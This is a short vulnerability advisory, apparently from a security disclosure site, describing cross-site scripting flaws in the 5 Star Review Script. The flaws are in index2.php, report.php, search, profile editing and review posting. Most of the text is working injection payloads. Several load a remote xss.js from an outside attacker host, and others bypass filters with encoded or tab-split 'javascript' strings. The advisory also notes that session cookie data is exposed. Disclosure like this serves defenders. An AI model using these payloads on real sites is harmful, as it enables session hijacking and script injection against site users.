5 Star Review - review-script.com - XSS w/ cookie output

2006.06.19
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 2.6/10
Impact Subscore: 2.9/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

5 Star Review Script Homepage: http://www.review-script.com/ Effected files: index2.php report.php search box editing your profile posting a review. ---------------------------------- index2.php XSS Vuln with cookie disclosure: By ending quotes and using a few closing and opening tags before and after, we can insertour script code and produce this vulnerability. http://www.example.com/index2.php?pg=2&item_id=11&sort=review.id'>">'><S CRIPT%20SRC=http://www.youfucktard. com/xss.js></SCRIPT><"<"<"<"&order=DESC&PHPSESSID=91c137efddf8844a26f5c5 7a8ca2d57d Screenshots: http://www.youfucktard.com/xsp/5star1.jpg http://www.youfucktard.com/xsp/5star2.jpg Aftering clicking the "Email a friend this link" we notice our text partyl is still on the screen aswell, dueto the cookie. Screenshots: http://www.youfucktard.com/xsp/5star3.jpg -------------------------------------- report.php XSS Vuln same as above: http://www.example.com/report.php?id=970&item_id=251'>">'><SCRIPT%20SRC= http://www.youfucktard.com/xss.js></SCRIPT><"<"<"<" Again, the cookie data is output on our screen. -------------------------------------- search_reviews.php XSS Vuln: One way to achive this XSS example would be to use long UTF-8 Unicode encoding without semicolons. For PoC try putting this in the search box: '>">'<IMG SRC=javascr&#0; 0105pt:aler&#0; 0116('XSS')><"<" <"<" Now, if we try touse '>">'><SCRIPT%20SRC=http://www.youfucktard.com/xss.js></SCRIPT><"<"<"<" Like the previous results, we get a screen spammed full of "javascript is not allowed" which goes all the way across, and down several screens. Screenshot: http://www.youfucktard.com/xsp/5star4.jpg --------------------------------------------- Editing your profile XSS Vuln: For aPoC try using no filtering at all: <SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT> Screenshots: http://www.youfucktard.com/xsp/5star5.jpg http://www.youfucktard.com/xsp/5star6.jpg ------------------------------------------ When posting a review, theres many ways to bypass the filters they use. The way I used in thisscreenshot was to put a tab between jav ascript. For aPoC make sure tabs on and enter: <IMG SRC="jav ascript:alert('XSS');"> Screenshots: http://www.youfucktard.com/xsp/5star7.jpg http://www.youfucktard.com/xsp/5star8.jpg -----------------------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top